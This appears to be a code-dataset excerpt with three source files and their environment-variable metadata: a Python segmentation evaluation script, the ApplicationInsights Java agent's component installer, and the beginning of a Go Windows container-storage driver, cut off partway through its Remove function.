def net_process(model, image, mean, std=None, flip=True):
input = torch.from_numpy(image.transpose((2, 0, 1))).float()
if std is None:
for t, m in zip(input, mean):
t.sub_(m)
else:
for t, m, s in zip(input, mean, std):
t.sub_(m).div_(s)
input = input.unsqueeze(0).cuda()
if flip:
input = torch.cat([input, input.flip(3)], 0)
with torch.no_grad():
output = model(input)
_, _, h_i, w_i = input.shape
_, _, h_o, w_o = output.shape
if (h_o != h_i) or (w_o != w_i):
output = F.interpolate(output, (h_i, w_i), mode='bilinear', align_corners=True)
output = F.softmax(output, dim=1)
if flip:
output = (output[0] + output[1].flip(2)) / 2
else:
output = output[0]
output = output.data.cpu().numpy()
output = output.transpose(1, 2, 0)
return output
def scale_process(model, image, classes, crop_h, crop_w, h, w, mean, std=None, stride_rate=2/3):
ori_h, ori_w, _ = image.shape
pad_h = max(crop_h - ori_h, 0)
pad_w = max(crop_w - ori_w, 0)
pad_h_half = int(pad_h / 2)
pad_w_half = int(pad_w / 2)
if pad_h > 0 or pad_w > 0:
image = cv2.copyMakeBorder(image, pad_h_half, pad_h - pad_h_half, pad_w_half, pad_w - pad_w_half, cv2.BORDER_CONSTANT, value=mean)
new_h, new_w, _ = image.shape
stride_h = int(np.ceil(crop_h*stride_rate))
stride_w = int(np.ceil(crop_w*stride_rate))
grid_h = int(np.ceil(float(new_h-crop_h)/stride_h) + 1)
grid_w = int(np.ceil(float(new_w-crop_w)/stride_w) + 1)
prediction_crop = np.zeros((new_h, new_w, classes), dtype=float)
count_crop = np.zeros((new_h, new_w), dtype=float)
for index_h in range(0, grid_h):
for index_w in range(0, grid_w):
s_h = index_h * stride_h
e_h = min(s_h + crop_h, new_h)
s_h = e_h - crop_h
s_w = index_w * stride_w
e_w = min(s_w + crop_w, new_w)
s_w = e_w - crop_w
image_crop = image[s_h:e_h, s_w:e_w].copy()
count_crop[s_h:e_h, s_w:e_w] += 1
prediction_crop[s_h:e_h, s_w:e_w, :] += net_process(model, image_crop, mean, std)
prediction_crop /= np.expand_dims(count_crop, 2)
prediction_crop = prediction_crop[pad_h_half:pad_h_half+ori_h, pad_w_half:pad_w_half+ori_w]
prediction = cv2.resize(prediction_crop, (w, h), interpolation=cv2.INTER_LINEAR)
return prediction
def adabn(model, reader, iterations, args):
logger.info('>>>>>>>>>>>>>>>> Start Adabn >>>>>>>>>>>>>>>>')
data_time = AverageMeter()
batch_time = AverageMeter()
model.train()
end = time.time()
# for i, (input, target) in enumerate(loader):
for i in range(iterations):
input, target = reader.read_data()
input = input.cuda(non_blocking=True) # input.shape= Bx3xHxW
target = target.cuda(non_blocking=True) # TARGET.shape= BxHxW
# import ipdb;ipdb.set_trace(context=20)
data_time.update(time.time() - end)
if args.zoom_factor != 8:
h = int((target.size()[1] - 1) / 8 * args.zoom_factor + 1)
w = int((target.size()[2] - 1) / 8 * args.zoom_factor + 1)
# 'nearest' mode doesn't support align_corners mode and 'bilinear' mode is fine for downsampling
target = F.interpolate(target.unsqueeze(1).float(), size=(h, w), mode='bilinear',
align_corners=True).squeeze(1).long()
input = input.cuda(non_blocking=True) # input.shape= Bx3xHxW
target = target.cuda(non_blocking=True) # TARGET.shape= BxHxW
output_pred, main_loss, aux_loss = model(input, target, sup_loss_method=args.sup_loss_method)
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % 10 == 0):
logger.info('adabn: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, iterations,
data_time=data_time,
batch_time=batch_time))
def test(test_loader, data_list, model, classes, mean, std, base_size, crop_h, crop_w, scales, gray_folder, color_folder, colors):
logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')
data_time = AverageMeter()
batch_time = AverageMeter()
model.eval()
end = time.time()
for i, (input, _) in enumerate(test_loader):
data_time.update(time.time() - end)
input = np.squeeze(input.numpy(), axis=0)
image = np.transpose(input, (1, 2, 0))
h, w, _ = image.shape
prediction = np.zeros((h, w, classes), dtype=float)
for scale in scales:
long_size = round(scale * base_size)
new_h = long_size
new_w = long_size
if h > w:
new_w = round(long_size/float(h)*w)
else:
new_h = round(long_size/float(w)*h)
image_scale = cv2.resize(image, (new_w, new_h), interpolation=cv2.INTER_LINEAR)
prediction += scale_process(model, image_scale, classes, crop_h, crop_w, h, w, mean, std)
prediction /= len(scales)
prediction = np.argmax(prediction, axis=2)
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % 10 == 0) or (i + 1 == len(test_loader)):
logger.info('Test: [{}/{}] '
'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}).'.format(i + 1, len(test_loader),
data_time=data_time,
batch_time=batch_time))
check_makedirs(gray_folder)
check_makedirs(color_folder)
gray = np.uint8(prediction)
color = colorize(gray, colors)
if args.split == 'test' and args.pseudo_data == 'cityscapes':
# ---- trainid to id
for trainid in range(args.classes):
trainid = 18-trainid
id = trainid2id[trainid]
gray[gray == trainid] = id
# import ipdb; ipdb.set_trace(context=20)
image_path, _ = data_list[i]
image_name = image_path.split('/')[-1].split('.')[0]
gray_path = os.path.join(gray_folder, image_name + '.png')
color_path = os.path.join(color_folder, image_name + '.png')
cv2.imwrite(gray_path, gray)
# color.save(color_path)
logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')
def cal_acc(data_list, pred_folder, classes, names):
intersection_meter = AverageMeter()
union_meter = AverageMeter()
target_meter = AverageMeter()
for i, (image_path, target_path) in enumerate(data_list):
image_name = image_path.split('/')[-1].split('.')[0]
pred = cv2.imread(os.path.join(pred_folder, image_name+'.png'), cv2.IMREAD_GRAYSCALE)
target = cv2.imread(target_path, cv2.IMREAD_GRAYSCALE)
intersection, union, target = intersectionAndUnion(pred, target, classes)
intersection_meter.update(intersection)
union_meter.update(union)
target_meter.update(target)
accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
logger.info('Evaluating {0}/{1} on image {2}, accuracy {3:.4f}.'.format(i + 1, len(data_list), image_name+'.png', accuracy))
iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
mIoU = np.mean(iou_class)
mAcc = np.mean(accuracy_class)
allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
logger.info('Eval result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))
for i in range(classes):
logger.info('Class_{} result: iou/accuracy {:.4f}/{:.4f}, name: {}.'.format(i, iou_class[i], accuracy_class[i], names[i]))
for i in range(classes):
print(iou_class[i])
if __name__ == '__main__':
main()
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
agent/agent-tooling/src/main/java/com/microsoft/applicationinsights/agent/internal/AiComponentInstaller.java
|
/*
* ApplicationInsights-Java
* Copyright (c) Microsoft Corporation
* All rights reserved.
*
* MIT License
* Permission is hereby granted, free of charge, to any person obtaining a copy of this
* software and associated documentation files (the ""Software""), to deal in the Software
* without restriction, including without limitation the rights to use, copy, modify, merge,
* publish, distribute, sublicense, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the following conditions:
* The above copyright notice and this permission notice shall be included in all copies or
* substantial portions of the Software.
* THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
* INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
* PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
* FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*/
package com.microsoft.applicationinsights.agent.internal;
import com.google.common.base.Strings;
import com.microsoft.applicationinsights.TelemetryClient;
import com.microsoft.applicationinsights.TelemetryConfiguration;
import com.microsoft.applicationinsights.agent.bootstrap.BytecodeUtil;
import com.microsoft.applicationinsights.agent.bootstrap.diagnostics.DiagnosticsHelper;
import com.microsoft.applicationinsights.agent.bootstrap.diagnostics.SdkVersionFinder;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.ApplicationInsightsAppenderClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.BytecodeUtilImpl;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.DependencyTelemetryClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.HeartBeatModuleClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.PerformanceCounterModuleClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.QuickPulseClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.RequestTelemetryClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.TelemetryClientClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.instrumentation.sdk.WebRequestTrackingFilterClassFileTransformer;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.MainEntryPoint;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.JmxMetric;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.ProcessorConfig;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.Configuration.ProfilerConfiguration;
import com.microsoft.applicationinsights.agent.internal.wasbootstrap.configuration.RpConfiguration;
import com.microsoft.applicationinsights.common.CommonUtils;
import com.microsoft.applicationinsights.customExceptions.FriendlyException;
import com.microsoft.applicationinsights.extensibility.initializer.ResourceAttributesContextInitializer;
import com.microsoft.applicationinsights.extensibility.initializer.SdkVersionContextInitializer;
import com.microsoft.applicationinsights.internal.channel.common.LazyHttpClient;
import com.microsoft.applicationinsights.internal.config.AddTypeXmlElement;
import com.microsoft.applicationinsights.internal.config.ApplicationInsightsXmlConfiguration;
import com.microsoft.applicationinsights.internal.config.JmxXmlElement;
import com.microsoft.applicationinsights.internal.config.ParamXmlElement;
import com.microsoft.applicationinsights.internal.config.TelemetryConfigurationFactory;
import com.microsoft.applicationinsights.internal.config.TelemetryModulesXmlElement;
import com.microsoft.applicationinsights.internal.config.connection.ConnectionString;
import com.microsoft.applicationinsights.internal.config.connection.InvalidConnectionStringException;
import com.microsoft.applicationinsights.internal.profiler.GcEventMonitor;
import com.microsoft.applicationinsights.internal.profiler.ProfilerServiceInitializer;
import com.microsoft.applicationinsights.internal.statsbeat.StatsbeatModule;
import com.microsoft.applicationinsights.internal.system.SystemInformation;
import com.microsoft.applicationinsights.internal.util.PropertyHelper;
import com.microsoft.applicationinsights.profiler.config.ServiceProfilerServiceConfig;
import io.opentelemetry.instrumentation.api.aisdk.AiLazyConfiguration;
import io.opentelemetry.javaagent.spi.ComponentInstaller;
import org.apache.http.HttpHost;
import org.checkerframework.checker.nullness.qual.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.File;
import java.lang.instrument.Instrumentation;
import java.net.URI;
import java.util.ArrayList;
import java.util.concurrent.CountDownLatch;
import static java.util.concurrent.TimeUnit.MINUTES;
import static java.util.concurrent.TimeUnit.SECONDS;
public class AiComponentInstaller implements ComponentInstaller {
private static final Logger startupLogger = LoggerFactory.getLogger("com.microsoft.applicationinsights.agent");
// TODO move to "agent builder" and then can inject this in the constructor
// or convert to ByteBuddy and use ByteBuddyAgentCustomizer
private static Instrumentation instrumentation;
public static void setInstrumentation(Instrumentation inst) {
instrumentation = inst;
}
@Override
public void beforeByteBuddyAgent() {
start(instrumentation);
// add sdk instrumentation after ensuring Global.getTelemetryClient() will not return null
instrumentation.addTransformer(new TelemetryClientClassFileTransformer());
instrumentation.addTransformer(new DependencyTelemetryClassFileTransformer());
instrumentation.addTransformer(new RequestTelemetryClassFileTransformer());
instrumentation.addTransformer(new PerformanceCounterModuleClassFileTransformer());
instrumentation.addTransformer(new QuickPulseClassFileTransformer());
instrumentation.addTransformer(new HeartBeatModuleClassFileTransformer());
instrumentation.addTransformer(new ApplicationInsightsAppenderClassFileTransformer());
instrumentation.addTransformer(new WebRequestTrackingFilterClassFileTransformer());
instrumentation.addTransformer(new DuplicateAgentClassFileTransformer());
}
@Override
public void afterByteBuddyAgent() {
// only safe now to resolve app id because SSL initialization
// triggers loading of java.util.logging (starting with Java 8u231)
// and JBoss/Wildfly need to install their own JUL manager before JUL is initialized
AppIdSupplier.registerAndStartAppIdRetrieval();
}
private static void start(Instrumentation instrumentation) {
String codelessSdkNamePrefix = getCodelessSdkNamePrefix();
if (codelessSdkNamePrefix != null) {
PropertyHelper.setSdkNamePrefix(codelessSdkNamePrefix);
}
File javaTmpDir = new File(System.getProperty("java.io.tmpdir"));
File tmpDir = new File(javaTmpDir, "applicationinsights-java");
if (!tmpDir.exists() && !tmpDir.mkdirs()) {
throw new IllegalStateException("Could not create directory: " + tmpDir.getAbsolutePath());
}
Configuration config = MainEntryPoint.getConfiguration();
if (!hasConnectionStringOrInstrumentationKey(config)) {
if (!("java".equals(System.getenv("FUNCTIONS_WORKER_RUNTIME")))) {
throw new FriendlyException("No connection string or instrumentation key provided",
"Please provide connection string or instrumentation key.");
}
}
// Function to validate user provided processor configuration
validateProcessorConfiguration(config);
// FIXME do something with config
// FIXME set doNotWeavePrefixes = "com.microsoft.applicationinsights.agent."
// FIXME set tryToLoadInBootstrapClassLoader = "com.microsoft.applicationinsights.agent."
// (maybe not though, this is only needed for classes in :agent:agent-bootstrap)
String jbossHome = System.getenv("JBOSS_HOME");
if (!Strings.isNullOrEmpty(jbossHome)) {
// this is used to delay SSL initialization because SSL initialization triggers loading of
// java.util.logging (starting with Java 8u231)
// and JBoss/Wildfly need to install their own JUL manager before JUL is initialized
LazyHttpClient.safeToInitLatch = new CountDownLatch(1);
instrumentation.addTransformer(new JulListeningClassFileTransformer(LazyHttpClient.safeToInitLatch));
}
if (config.proxy.host != null) {
LazyHttpClient.proxy = new HttpHost(config.proxy.host, config.proxy.port);
}
AppIdSupplier appIdSupplier = AppIdSupplier.INSTANCE;
TelemetryConfiguration configuration = TelemetryConfiguration.getActiveWithoutInitializingConfig();
TelemetryConfigurationFactory.INSTANCE.initialize(configuration, buildXmlConfiguration(config));
configuration.getContextInitializers().add(new SdkVersionContextInitializer());
configuration.getContextInitializers().add(new ResourceAttributesContextInitializer(config.customDimensions));
try {
ConnectionString.updateStatsbeatConnectionString(config.internal.statsbeat.instrumentationKey, config.internal.statsbeat.endpoint, configuration);
} catch (InvalidConnectionStringException ex) {
startupLogger.warn("Statsbeat endpoint is invalid. {}", ex.getMessage());
}
Global.setSamplingPercentage(config.sampling.percentage);
final TelemetryClient telemetryClient = new TelemetryClient();
Global.setTelemetryClient(telemetryClient);
ProfilerServiceInitializer.initialize(
appIdSupplier::get,
SystemInformation.INSTANCE.getProcessId(),
formServiceProfilerConfig(config.preview.profiler),
configuration.getRoleInstance(),
// TODO this will not work with Azure Spring Cloud updating connection string at runtime
configuration.getInstrumentationKey(),
telemetryClient,
formApplicationInsightsUserAgent(),
formGcEventMonitorConfiguration(config.preview.gcEvents)
);
// this is for Azure Function Linux consumption plan support.
if ("java".equals(System.getenv("FUNCTIONS_WORKER_RUNTIME"))) {
AiLazyConfiguration.setAccessor(new LazyConfigurationAccessor());
}
// this is currently used by Micrometer instrumentation in addition to 2.x SDK
BytecodeUtil.setDelegate(new BytecodeUtilImpl());
Runtime.getRuntime().addShutdownHook(new Thread() {
@Override
public void run() {
startupLogger.debug("running shutdown hook");
try {
telemetryClient.flush();
telemetryClient.shutdown(5, SECONDS);
startupLogger.debug("completed shutdown hook");
} catch (InterruptedException e) {
startupLogger.debug("interrupted while flushing telemetry during shutdown");
} catch (Throwable t) {
startupLogger.debug(t.getMessage(), t);
}
}
});
RpConfiguration rpConfiguration = MainEntryPoint.getRpConfiguration();
if (rpConfiguration != null) {
RpConfigurationPolling.startPolling(rpConfiguration, config);
}
// initialize StatsbeatModule
StatsbeatModule.initialize(telemetryClient, config.internal.statsbeat.intervalSeconds, config.internal.statsbeat.featureIntervalSeconds);
}
private static GcEventMonitor.GcEventMonitorConfiguration formGcEventMonitorConfiguration(Configuration.GcEventConfiguration gcEvents) {
return new GcEventMonitor.GcEventMonitorConfiguration(gcEvents.reportingLevel);
}
private static String formApplicationInsightsUserAgent() {
String aiVersion = SdkVersionFinder.getTheValue();
String javaVersion = System.getProperty("java.version");
String osName = System.getProperty("os.name");
String arch = System.getProperty("os.arch");
String userName = "Microsoft-ApplicationInsights-Java-Profiler/" + aiVersion + " (Java/" + javaVersion + "; " + osName + "; " + arch + ")";
return userName;
}
private static ServiceProfilerServiceConfig formServiceProfilerConfig(ProfilerConfiguration configuration) {
URI serviceProfilerFrontEndPoint = TelemetryConfiguration.getActive().getEndpointProvider().getProfilerEndpoint();
return new ServiceProfilerServiceConfig(
configuration.configPollPeriodSeconds,
configuration.periodicRecordingDurationSeconds,
configuration.periodicRecordingIntervalSeconds,
serviceProfilerFrontEndPoint,
configuration.enabled,
configuration.memoryTriggeredSettings,
configuration.cpuTriggeredSettings
);
}
private static void validateProcessorConfiguration(Configuration config) throws FriendlyException {
if (config.preview == null || config.preview.processors == null) return;
for (ProcessorConfig processorConfig : config.preview.processors) {
processorConfig.validate();
}
}
@Nullable
private static String getCodelessSdkNamePrefix() {
if (!DiagnosticsHelper.isRpIntegration()) {
return null;
}
StringBuilder sdkNamePrefix = new StringBuilder(4);
sdkNamePrefix.append(DiagnosticsHelper.rpIntegrationChar());
if (SystemInformation.INSTANCE.isWindows()) {
sdkNamePrefix.append("w");
} else if (SystemInformation.INSTANCE.isUnix()) {
sdkNamePrefix.append("l");
} else {
startupLogger.warn("could not detect os: {}", System.getProperty("os.name"));
sdkNamePrefix.append("u");
}
sdkNamePrefix.append("r_"); // "r" is for "recommended"
return sdkNamePrefix.toString();
}
private static boolean hasConnectionStringOrInstrumentationKey(Configuration config) {
return !Strings.isNullOrEmpty(config.connectionString);
}
private static ApplicationInsightsXmlConfiguration buildXmlConfiguration(Configuration config) {
ApplicationInsightsXmlConfiguration xmlConfiguration = new ApplicationInsightsXmlConfiguration();
if (!Strings.isNullOrEmpty(config.connectionString)) {
xmlConfiguration.setConnectionString(config.connectionString);
}
if (!Strings.isNullOrEmpty(config.role.name)) {
xmlConfiguration.setRoleName(config.role.name);
}
if (!Strings.isNullOrEmpty(config.role.instance)) {
xmlConfiguration.setRoleInstance(config.role.instance);
} else {
String hostname = CommonUtils.getHostName();
xmlConfiguration.setRoleInstance(hostname == null ? "unknown" : hostname);
}
// configure heartbeat module
AddTypeXmlElement heartbeatModule = new AddTypeXmlElement();
heartbeatModule.setType("com.microsoft.applicationinsights.internal.heartbeat.HeartBeatModule");
// do not allow interval longer than 15 minutes, since we use the heartbeat data for usage telemetry
long intervalSeconds = Math.min(config.heartbeat.intervalSeconds, MINUTES.toSeconds(15));
heartbeatModule.getParameters().add(newParamXml("HeartBeatInterval", Long.toString(intervalSeconds)));
ArrayList<AddTypeXmlElement> modules = new ArrayList<>();
modules.add(heartbeatModule);
TelemetryModulesXmlElement modulesXml = new TelemetryModulesXmlElement();
modulesXml.setAdds(modules);
xmlConfiguration.setModules(modulesXml);
// configure custom jmx metrics
ArrayList<JmxXmlElement> jmxXmls = new ArrayList<>();
for (JmxMetric jmxMetric : config.jmxMetrics) {
JmxXmlElement jmxXml = new JmxXmlElement();
jmxXml.setName(jmxMetric.name);
jmxXml.setObjectName(jmxMetric.objectName);
jmxXml.setAttribute(jmxMetric.attribute);
jmxXmls.add(jmxXml);
}
xmlConfiguration.getPerformance().setJmxXmlElements(jmxXmls);
xmlConfiguration.getPerformance().setCollectionFrequencyInSec(config.preview.metricIntervalSeconds);
xmlConfiguration.getQuickPulse().setEnabled(config.preview.liveMetrics.enabled);
if (config.preview.developerMode) {
xmlConfiguration.getChannel().setDeveloperMode(true);
}
return xmlConfiguration;
}
private static ParamXmlElement newParamXml(String name, String value) {
ParamXmlElement paramXml = new ParamXmlElement();
paramXml.setName(name);
paramXml.setValue(value);
return paramXml;
}
}
|
[
"\"FUNCTIONS_WORKER_RUNTIME\"",
"\"JBOSS_HOME\"",
"\"FUNCTIONS_WORKER_RUNTIME\""
] |
[] |
[
"JBOSS_HOME",
"FUNCTIONS_WORKER_RUNTIME"
] |
[]
|
["JBOSS_HOME", "FUNCTIONS_WORKER_RUNTIME"]
|
java
| 2 | 0 | |
vendor/github.com/containers/storage/drivers/windows/windows.go
|
//+build windows
package windows
import (
"bufio"
"bytes"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"os"
"path"
"path/filepath"
"strconv"
"strings"
"sync"
"syscall"
"time"
"unsafe"
"github.com/Microsoft/go-winio"
"github.com/Microsoft/go-winio/archive/tar"
"github.com/Microsoft/go-winio/backuptar"
"github.com/Microsoft/hcsshim"
"github.com/containers/storage/drivers"
"github.com/containers/storage/pkg/archive"
"github.com/containers/storage/pkg/idtools"
"github.com/containers/storage/pkg/ioutils"
"github.com/containers/storage/pkg/longpath"
"github.com/containers/storage/pkg/reexec"
"github.com/containers/storage/pkg/system"
units "github.com/docker/go-units"
"github.com/sirupsen/logrus"
"golang.org/x/sys/windows"
)
// filterDriver is an HCSShim driver type for the Windows Filter driver.
const filterDriver = 1
var (
// mutatedFiles is a list of files that are mutated by the import process
// and must be backed up and restored.
mutatedFiles = map[string]string{
"UtilityVM/Files/EFI/Microsoft/Boot/BCD": "bcd.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG": "bcd.log.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG1": "bcd.log1.bak",
"UtilityVM/Files/EFI/Microsoft/Boot/BCD.LOG2": "bcd.log2.bak",
}
noreexec = false
)
// init registers the windows graph drivers to the register.
func init() {
graphdriver.Register("windowsfilter", InitFilter)
// DOCKER_WINDOWSFILTER_NOREEXEC allows for inline processing which makes
// debugging issues in the re-exec codepath significantly easier.
if os.Getenv("DOCKER_WINDOWSFILTER_NOREEXEC") != "" {
logrus.Warnf("WindowsGraphDriver is set to not re-exec. This is intended for debugging purposes only.")
noreexec = true
} else {
reexec.Register("docker-windows-write-layer", writeLayerReexec)
}
}
type checker struct {
}
func (c *checker) IsMounted(path string) bool {
return false
}
// Driver represents a windows graph driver.
type Driver struct {
// info stores the shim driver information
info hcsshim.DriverInfo
ctr *graphdriver.RefCounter
// it is safe for windows to use a cache here because it does not support
// restoring containers when the daemon dies.
cacheMu sync.Mutex
cache map[string]string
}
// InitFilter returns a new Windows storage filter driver.
func InitFilter(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
logrus.Debugf("WindowsGraphDriver InitFilter at %s", home)
fsType, err := getFileSystemType(string(home[0]))
if err != nil {
return nil, err
}
if strings.ToLower(fsType) == "refs" {
return nil, fmt.Errorf("%s is on an ReFS volume - ReFS volumes are not supported", home)
}
if err := idtools.MkdirAllAs(home, 0700, 0, 0); err != nil {
return nil, fmt.Errorf("windowsfilter failed to create '%s': %v", home, err)
}
d := &Driver{
info: hcsshim.DriverInfo{
HomeDir: home,
Flavour: filterDriver,
},
cache: make(map[string]string),
ctr: graphdriver.NewRefCounter(&checker{}),
}
return d, nil
}
// win32FromHresult is a helper function to get the win32 error code from an HRESULT
func win32FromHresult(hr uintptr) uintptr {
if hr&0x1fff0000 == 0x00070000 {
return hr & 0xffff
}
return hr
}
// getFileSystemType obtains the type of a file system through GetVolumeInformation
// https://msdn.microsoft.com/en-us/library/windows/desktop/aa364993(v=vs.85).aspx
func getFileSystemType(drive string) (fsType string, hr error) {
var (
modkernel32 = windows.NewLazySystemDLL("kernel32.dll")
procGetVolumeInformation = modkernel32.NewProc("GetVolumeInformationW")
buf = make([]uint16, 255)
size = windows.MAX_PATH + 1
)
if len(drive) != 1 {
hr = errors.New("getFileSystemType must be called with a drive letter")
return
}
drive += `:\`
n := uintptr(unsafe.Pointer(nil))
r0, _, _ := syscall.Syscall9(procGetVolumeInformation.Addr(), 8, uintptr(unsafe.Pointer(windows.StringToUTF16Ptr(drive))), n, n, n, n, n, uintptr(unsafe.Pointer(&buf[0])), uintptr(size), 0)
if int32(r0) < 0 {
hr = syscall.Errno(win32FromHresult(r0))
}
fsType = windows.UTF16ToString(buf)
return
}
// String returns the string representation of a driver. This should match
// the name the graph driver has been registered with.
func (d *Driver) String() string {
return "windowsfilter"
}
// Status returns the status of the driver.
func (d *Driver) Status() [][2]string {
return [][2]string{
{"Windows", ""},
}
}
// panicIfUsedByLcow does exactly what it says.
// TODO @jhowardmsft - this is a temporary measure for the bring-up of
// Linux containers on Windows. It is a failsafe to ensure that the right
// graphdriver is used.
func panicIfUsedByLcow() {
if system.LCOWSupported() {
panic("inconsistency - windowsfilter graphdriver should not be used when in LCOW mode")
}
}
// Exists returns true if the given id is registered with this driver.
func (d *Driver) Exists(id string) bool {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return false
}
result, err := hcsshim.LayerExists(d.info, rID)
if err != nil {
return false
}
return result
}
// CreateReadWrite creates a layer that is writable for use as a container
// file system.
func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
panicIfUsedByLcow()
if opts != nil {
return d.create(id, parent, opts.MountLabel, false, opts.StorageOpt)
}
return d.create(id, parent, "", false, nil)
}
// Create creates a new read-only layer with the given id.
func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
panicIfUsedByLcow()
if opts != nil {
return d.create(id, parent, opts.MountLabel, true, opts.StorageOpt)
}
return d.create(id, parent, "", true, nil)
}
func (d *Driver) create(id, parent, mountLabel string, readOnly bool, storageOpt map[string]string) error {
rPId, err := d.resolveID(parent)
if err != nil {
return err
}
parentChain, err := d.getLayerChain(rPId)
if err != nil {
return err
}
var layerChain []string
if rPId != "" {
parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
if err != nil {
return err
}
if _, err := os.Stat(filepath.Join(parentPath, "Files")); err == nil {
// This is a legitimate parent layer (not the empty "-init" layer),
// so include it in the layer chain.
layerChain = []string{parentPath}
}
}
layerChain = append(layerChain, parentChain...)
if readOnly {
if err := hcsshim.CreateLayer(d.info, id, rPId); err != nil {
return err
}
} else {
var parentPath string
if len(layerChain) != 0 {
parentPath = layerChain[0]
}
if err := hcsshim.CreateSandboxLayer(d.info, id, parentPath, layerChain); err != nil {
return err
}
storageOptions, err := parseStorageOpt(storageOpt)
if err != nil {
return fmt.Errorf("Failed to parse storage options - %s", err)
}
if storageOptions.size != 0 {
if err := hcsshim.ExpandSandboxSize(d.info, id, storageOptions.size); err != nil {
return err
}
}
}
if _, err := os.Lstat(d.dir(parent)); err != nil {
if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
}
return fmt.Errorf("Cannot create layer with missing parent %s: %s", parent, err)
}
if err := d.setLayerChain(id, layerChain); err != nil {
if err2 := hcsshim.DestroyLayer(d.info, id); err2 != nil {
logrus.Warnf("Failed to DestroyLayer %s: %s", id, err2)
}
return err
}
return nil
}
// dir returns the absolute path to the layer.
func (d *Driver) dir(id string) string {
return filepath.Join(d.info.HomeDir, filepath.Base(id))
}
// Remove unmounts and removes the dir information.
func (d *Driver) Remove(id string) error {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return err
}
// This retry loop is due to a bug in Windows (Internal bug #9432268)
// if GetContainers fails with ErrVmcomputeOperationInvalidState
// it is a transient error. Retry until it succeeds.
var computeSystems []hcsshim.ContainerProperties
retryCount := 0
osv := system.GetOSVersion()
for {
// Get and terminate any template VMs that are currently using the layer.
// Note: It is unfortunate that we end up in the graphdrivers Remove() call
// for both containers and images, but the logic for template VMs is only
// needed for images - specifically we are looking to see if a base layer
// is in use by a template VM as a result of having started a Hyper-V
// container at some point.
//
// We have a retry loop for ErrVmcomputeOperationInvalidState and
// ErrVmcomputeOperationAccessIsDenied as there is a race condition
// in RS1 and RS2 building during enumeration when a silo is going away
// for example under it, in HCS. AccessIsDenied added to fix 30278.
//
// TODO @jhowardmsft - For RS3, we can remove the retries. Also consider
// using platform APIs (if available) to get this more succinctly. Also
// consider enhancing the Remove() interface to have context of why
// the remove is being called - that could improve efficiency by not
// enumerating compute systems during a remove of a container as it's
// not required.
computeSystems, err = hcsshim.GetContainers(hcsshim.ComputeSystemQuery{})
if err != nil {
if (osv.Build < 15139) &&
((err == hcsshim.ErrVmcomputeOperationInvalidState) || (err == hcsshim.ErrVmcomputeOperationAccessIsDenied)) {
if retryCount >= 500 {
break
}
retryCount++
time.Sleep(10 * time.Millisecond)
continue
}
return err
}
break
}
for _, computeSystem := range computeSystems {
if strings.Contains(computeSystem.RuntimeImagePath, id) && computeSystem.IsRuntimeTemplate {
container, err := hcsshim.OpenContainer(computeSystem.ID)
if err != nil {
return err
}
defer container.Close()
err = container.Terminate()
if hcsshim.IsPending(err) {
err = container.Wait()
} else if hcsshim.IsAlreadyStopped(err) {
err = nil
}
if err != nil {
return err
}
}
}
layerPath := filepath.Join(d.info.HomeDir, rID)
tmpID := fmt.Sprintf("%s-removing", rID)
tmpLayerPath := filepath.Join(d.info.HomeDir, tmpID)
